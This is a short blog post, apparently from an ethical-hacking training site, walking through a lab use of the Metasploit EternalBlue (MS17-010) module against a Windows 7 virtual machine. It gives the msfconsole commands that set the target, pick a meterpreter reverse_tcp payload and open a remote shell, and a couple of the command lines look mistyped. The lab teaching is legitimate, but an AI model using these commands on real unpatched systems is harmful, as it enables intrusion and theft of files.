MS17-010 EternalBlue

EternalBlue is an exploit supposedly developed by the NSA. It was leaked by the hacker group “Shadow Brokers” on April 14, 2017, and was used in the common ransomware attack with WannaCry on May 12, 2017. 

Name of the module
exploit / windows / smb / ms17_010_eternalblue

Authors
Sean Dillon <sean.dillon [at] riskense.com>
Dylan Davis <dylan.davis [at] riskense.com>
Group of equations
Shadow Brokers
thelightcosine

Module objectives
Windows 7 and Server 2008 R2 (x64) All Service Packs

Architectures
x64

Module options

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show targets
            ...targets...
msf exploit(ms17_010_eternalblue) > set TARGET <target-id>
msf exploit(ms17_010_eternalblue) > show options
            ...show and set options...
msf exploit(ms17_010_eternalblue) > exploit

We will make a simple example so you can see the scope of this module.

The requirements are the following:

  1. Windows 7 virtual machine
  2. Linux ubuntu  virtual machine
  3. Virtual-box
  4. Metasploit

As a first step we make sure that they are connected in the same network. that the Linux machine can ping windows 7.

EternalBlue is an exploit that exploits a vulnerability in Microsoft SMB v1.0. This exploit is now commonly used in malware to help spread it across a network. Some malicious programs that have been used are WannaCry, Trickbot, WannaMine and many others. Machines that are not patched against this vulnerability have a high risk of attack.

let’s start playing with this

We open a ubuntu terminal and write the following.

$ msfconsole -q
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.248.3
> use payload/windows/x64/meterpreter/reverse_tcp
> set RHOST 192.168.248.4

> exploit

 meterpreter > shell

As a final result we have a shell of our victim, and besides that, we can look for the files that we want.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Resources:

https://www.rapid7.com/db/modules/payload/windows/x64/meterpreter/reverse_tcp

Data-mining a compromised host

Avatar

This post was written by Ruben Dario Caravajal Herrera